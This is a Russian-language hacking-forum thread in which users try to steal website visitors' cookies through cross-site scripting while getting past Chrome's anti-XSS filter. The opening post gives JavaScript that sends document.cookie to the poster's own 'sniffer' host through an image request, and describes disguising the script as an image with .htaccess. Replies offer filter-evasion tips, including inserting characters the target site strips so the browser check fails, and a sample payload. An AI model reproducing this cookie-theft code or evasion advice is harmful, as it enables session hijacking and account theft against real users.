![]() |
Видел одну тему:
HTML highlight [LEFT][CODE] Обход Chrome и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например img = new Image(); img.src = "http://s.gif?"+document.cookie; это мы скрываем расширение .js и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме. Теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер. Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie... Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess? |
Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter
http://blog.securitee.org/?p=37 но этот баг уже пофиксили ))) |
Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...
Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess? Ты .htaccess прописал на своем хосте, и прописал код в картинку с расширением .png. Ты думаешь, вставляя картинку на чужой хост, ты украдешь куки? Как бы не так. То правило в .htaccess действительно для твоего хостинга, а не для хоста, с которого крадешь куки. Для целевого сайта картинка воспринимается как обычная картинка. Включайте мозги и обходите фильтры - будет все у вас "проглатывать" =) |
Цитата:
Сообщение от albseeras Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter http://blog.securitee.org/?p=37 но этот баг уже пофиксили ))) смотря где и в каком месте например тут в Parameter Values Value of GET parameter b: существует проверь на Chrome http://securitee-playground.co.cc/fi...;%3C/script%3E значит код можно выполнить таким вот образом /*//&b=*/alert%281%29; то есть нужно смотреть в то место где произошла хss атака включай элемент поиска в браузере + мозги и затачивай под гоогле хроме свой скрипт |
Ребята что хром такое позволяет?
|
Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться
alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ??? |
Цитата:
Сообщение от albseeras Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ??? какойто вывод у вас не понятный! какое отношение другой домен имеет к alert(document.cookie), если простой алерт не срабатывает, ищите знаки которые фильтрует сам сайт, и вставляйте их в скрипт, при проходе через фильтр знак отфильтруется , хром увидит несовпадение скрипта в адресной строке и в исходном коде, и пропустит скрипт! |
Цитата:
Сообщение от albseeras Проверил , оказалось проблема не в фильтрах (синтаксических)- так, как в коде HTML-страницы Хрома все ,таки выводиться alert(document.cookie)"> т.е. фильтры Хрома пропускают -">alert(document.cookie) и скрипт должен срабатывать в браузере,но он не срабатывает (не выводится alert).Вывод типа Хром не запускает javascript-ы с других доменов ,кроме как с основного ,тобишь защита от межсайтового скриптинга . У кого-нибудь есть мыслишки по этому поводу ??? ты где то рядом http://www.securitylab.ru/vulnerability/420496.php |
| Время: 00:36 |